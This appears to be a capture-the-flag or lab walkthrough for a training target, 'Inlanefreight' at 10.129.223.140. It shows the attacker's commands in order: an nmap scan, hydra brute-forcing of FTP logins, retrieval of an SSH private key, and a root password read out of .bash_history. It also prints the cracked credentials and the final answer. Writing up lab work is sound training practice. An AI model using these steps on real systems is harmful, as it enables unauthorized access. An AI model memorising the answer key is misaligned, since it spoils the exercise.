Our client Inlanefreight contracted us to assess individual hosts in their network, focusing on access control. The company recently implemented security controls related to authorization that they would like us to test. There are three hosts in scope for this assessment. The first host is used for administering and managing other servers within their environment.


CHALLENGE: 10.129.223.140


Question 1 - Examine the first target and submit the root password as the answer. 
1. nmap -sCV 10.129.223.140 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 12:34 CDT
Nmap scan report for 10.129.223.140
Host is up (0.0093s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
|   256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_  256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

2. lets run hydra to crack ftp creds 
3 hydra -L username.list -P password.list ftp://10.129.223.140 -t 40 -f -u
[21][ftp] host: 10.129.223.140   login: mike   password: 7777777
4. ftp mike@10.129.223.140 
5. dir 
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000          554 Feb 09  2022 authorized_keys
-rw-------    1 1000     1000         2546 Feb 09  2022 id_rsa
-rw-r--r--    1 1000     1000          570 Feb 09  2022 id_rsa.pub

6. i transferred all 3 to host with get 
7. chmod 600 id_rsa 
8. ssh -i id_rsa mike@10.129.223.140 -> passphrase is 7777777 
9. sudo -l 
[sudo] password for mike: 
Sorry, user mike may not run sudo on skills-easy.
10. so not that way... 
11. ls -lah 
12. we see theres a good size inside of .bash_history 
13. cat .bash_history 
14. we find -> analysis.py -u root -p dgb6fzm0ynk@AME9pqu
15. thats actually all that was needed. so final answer is dgb6fzm0ynk@AME9pqu
